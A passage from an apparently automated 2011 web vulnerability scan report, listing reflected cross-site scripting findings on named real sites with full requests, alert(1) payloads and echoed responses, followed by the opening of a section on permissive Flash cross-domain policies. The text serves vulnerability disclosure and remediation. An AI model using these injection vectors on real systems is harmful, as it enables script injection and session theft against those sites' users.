Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:24 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9760


var lhnTrack='f66e04';alert(1)//c592964d139';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepe
...[SNIP]...

3.125. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 55a0d%3balert(1)//87929036ab1 was submitted in the zimg parameter. This input was echoed as 55a0d;alert(1)//87929036ab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=5955a0d%3balert(1)//87929036ab1&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 16:18:23 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9840


var lhnTrack='f';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnl
...[SNIP]...
mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 5955a0d;alert(1)//87929036ab1 + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=&rndstr=" + lhnrand_no + "'>
...[SNIP]...

3.126. http://www.w3schools.com/js/tryit_view.asp [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /js/tryit_view.asp

Issue detail

The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 1bb34<script>alert(1)</script>4e27ce41b52 was submitted in the code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /js/tryit_view.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/tryit.asp?filename=tryjs_text
Content-Length: 289
Cache-Control: max-age=0
Origin: http://www.w3schools.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.10.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

submit=Edit+and+Click+Me+%3E%3E&code=%253Chtml%253E%250A%253Cbody%253E%250A%250A%253Cscript%2520type%253D%2522text%2Fjavascript%2522%253E%250Adocument.write%2528%2522Hello%2520World%2521%2522%2529%253B%250A%253C%2Fscript%253E%250A%250A%253C%2Fbody%253E%250A%253C%2Fhtml%253E%250A%250A1bb34<script>alert(1)</script>4e27ce41b52&bt=1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:30 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 148
Content-Type: text/html
Cache-control: private

<html>
<body>

<script type="text/javascript">
document.write("Hello World!");
</script>

</body>
</html>

1bb34<script>alert(1)</script>4e27ce41b52

3.127. http://www.w3schools.com/jsref/tryit_view.asp [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit_view.asp

Issue detail

The value of the code request parameter is copied into the HTML document as plain text between tags. The payload 303c8<script>alert(1)</script>a71ebc654b was submitted in the code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /jsref/tryit_view.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_doc_open2
Content-Length: 439
Cache-Control: max-age=0
Origin: http://www.w3schools.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.11.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

submit=Edit+and+Click+Me+%3E%3E&code=%253Chtml%253E%250A%253Cbody%253E%250A%250A%253Cscript%2520type%253D%2522text%2Fjavascript%2522%253E%250Avar%2520w%253Dwindow.open%2528%2529%253B%250Aw.document.op
...[SNIP]...
rite%2528%2522%253Ch1%253EHello%2520World%2521%253C%2Fh1%253E%2522%2529%253B%250Aw.document.close%2528%2529%253B%250A%253C%2Fscript%253E%250A%250A%253C%2Fbody%253E%250A%253C%2Fhtml%253E%2520%250A%250A303c8<script>alert(1)</script>a71ebc654b&bt=1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:32:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Cache-control: private

<html>
<body>

<script type="text/javascript">
var w=window.open();
w.document.open();
w.document.write("<h1>Hello World!</h1>");
w.document.close();
</script>

</body>
</html>

303c8<script>alert(1)</script>a71ebc654b

3.128. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d2551<script>alert(1)</script>1979d1643d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: d2551<script>alert(1)</script>1979d1643d9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:17:57 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=5385daf0-5a45-4c91-b8da-57deda1620a8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: d2551<script>alert(1)</script>1979d1643d9

3.129. https://mpsnare.iesnare.com/snare.js [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mpsnare.iesnare.com
Path:   /snare.js

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78d"-alert(1)-"b6aa71aa6bb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /snare.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)de78d"-alert(1)-"b6aa71aa6bb
Accept-Encoding: gzip, deflate
Cookie: token=XnRHGFdzDJ8Inb%2Fhay3wwALOAzXiYWksbDCgNf6jldU%3D
Host: mpsnare.iesnare.com
Connection: Keep-Alive
Cache-Control: no-cache
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:13 GMT
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: token=fdYa0tIi8TSNEW3rvx0RPGo677MT9Ucnr83oXeEM4Go%3D; domain=iesnare.com; path=/; expires=Wed, 01-Sep-2021 21:35:13 GMT; secure
p3p: CP="NON DSP COR CURa"
Keep-Alive: timeout=2, max=74
Connection: Keep-Alive
Content-Type: text/javascript
Expires: Sun, 04 Sep 2011 21:35:13 GMT
Content-Length: 29980

/* Copyright(c) 2009, iovation, inc. All rights reserved. Version: 3.0.0 */ window.io_last_error="";function isRipEnabled(){return window.io_enable_rip;}function contentUrl(){return __if_b(_i_f);}func
...[SNIP]...
{this.JENBL="1";this.UAGT=navigator.userAgent;if(!__if_j()){this.JSTOKEN="fdYa0tIi8TSNEW3rvx0RPGo677MT9Ucnr83oXeEM4Go=";this.UAGT="Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)de78d"-alert(1)-"b6aa71aa6bb";this.HACCLNG="en-US";this.HACCCHR="";}this.JSVER="300";var _i_dr=new Date();this.TZON=String(_i_dr.getTimezoneOffset());this.JSTIME=_i_dr.__if_m();var _i_ce=new __if_i();this.JBRNM=_i_ce.browser;this
...[SNIP]...

3.130. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a1d"-alert(1)-"59b4541068d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=31a1d"-alert(1)-"59b4541068d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=755C60E8161379FBEEA117E61515830A; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=31a1d"-alert(1)-"59b4541068d",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240&campId=161441",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000
...[SNIP]...

3.131. http://apps.sapha.com/appshandler.php [sapha_2522_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the sapha_2522_1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e89c4'%3balert(1)//76f56e1d866 was submitted in the sapha_2522_1 cookie. This input was echoed as e89c4';alert(1)//76f56e1d866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appshandler.php?ac=2522&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE; sapha_2522_1=1038376%7C214589%7C149788%7C2011-09-04+10%3A18%3A45e89c4'%3balert(1)//76f56e1d866

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 20427
Connection: close
Content-Type: application/x-javascript

var lastpageview_ID='1038376';var lastvisit_ID='214589';var lastvisitor_ID='149788';var lastvisit_datetime='2011-09-04 10:18:45e89c4';alert(1)//76f56e1d866';function loadDomUtils(){if(document.getElementsByClassName==undefined){document.getElementsByClassName=function(B,A){if(A==null){A="*"}var F=new RegExp("(?:^|\\s)"+B+"(?:$|\\s)");var G=document.getEl
...[SNIP]...

3.132. http://ecustomeropinions.com/survey/survey.php [server cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bbe"%20style%3dx%3aexpression(alert(1))%200e696d288b3 was submitted in the server cookie. This input was echoed as b2bbe\" style=x:expression(alert(1)) 0e696d288b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

POST /survey/survey.php HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ecustomeropinions.com/survey/survey.php?sid=603736412&data1=5.5.0.115&data2=xss.cx
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=---------------------------7db5bf1d41c68
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: ecustomeropinions.com
Content-Length: 2753
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: server=www18b2bbe"%20style%3dx%3aexpression(alert(1))%200e696d288b3; PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3

-----------------------------7db5bf1d41c68
Content-Disposition: form-data; name="survey_submitting"

1
-----------------------------7db5bf1d41c68
Content-Disposition: form-data; name="sid"

603
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:11:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Content-Length: 6521
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="debug_server_page_cookie" value="www18b2bbe\" style=x:expression(alert(1)) 0e696d288b3" />
...[SNIP]...

3.133. http://ecustomeropinions.com/survey/survey.php [server cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The value of the server cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b5d7"%20style%3dx%3aexpression(alert(1))%208dda330855a was submitted in the server cookie. This input was echoed as 6b5d7\" style=x:expression(alert(1)) 8dda330855a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /survey/survey.php?sid=603736412&pagenum=1&ecos_live_sessionkey=ecos_sesh_753333&doneskipping=1&vault=_ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com
Cookie: server=6b5d7"%20style%3dx%3aexpression(alert(1))%208dda330855a; PHPSESSID=mgd0vgc60sr4gk9t1ql92arlu3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www19; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Content-Length: 6318
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="debug_server_page_cookie" value="6b5d7\" style=x:expression(alert(1)) 8dda330855a" />
...[SNIP]...

3.134. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ba3"><script>alert(1)</script>aac61ce975a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?20ba3"><script>alert(1)</script>aac61ce975a=1 HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 04 Sep 2011 16:31:13 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 243
Location: http://h30046.www3.hp.com/?20ba3"><script>alert(1)</script>aac61ce975a=1

<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?20ba3"><script>alert(1)</script>aac61ce975a=1">http://h30046.www3.hp.com/?20ba3"><script>alert
...[SNIP]...

3.135. https://h30046.www3.hp.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aa4b2<script>alert(1)</script>994bc586213 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?aa4b2<script>alert(1)</script>994bc586213=1 HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 04 Sep 2011 16:31:14 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 239
Location: http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1

<html><body>The requested resource was moved. It could be found here: <a href="http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1">http://h30046.www3.hp.com/?aa4b2<script>alert(1)</script>994bc586213=1</a>
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 67 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://142.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 142.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 05 Sep 2011 02:30:52 GMT
Content-Type: text/xml;charset=UTF-8
Date: Mon, 05 Sep 2011 02:30:51 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

4.3. http://afe.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.4. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 23:16:58 GMT
Date: Sat, 03 Sep 2011 23:16:58 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
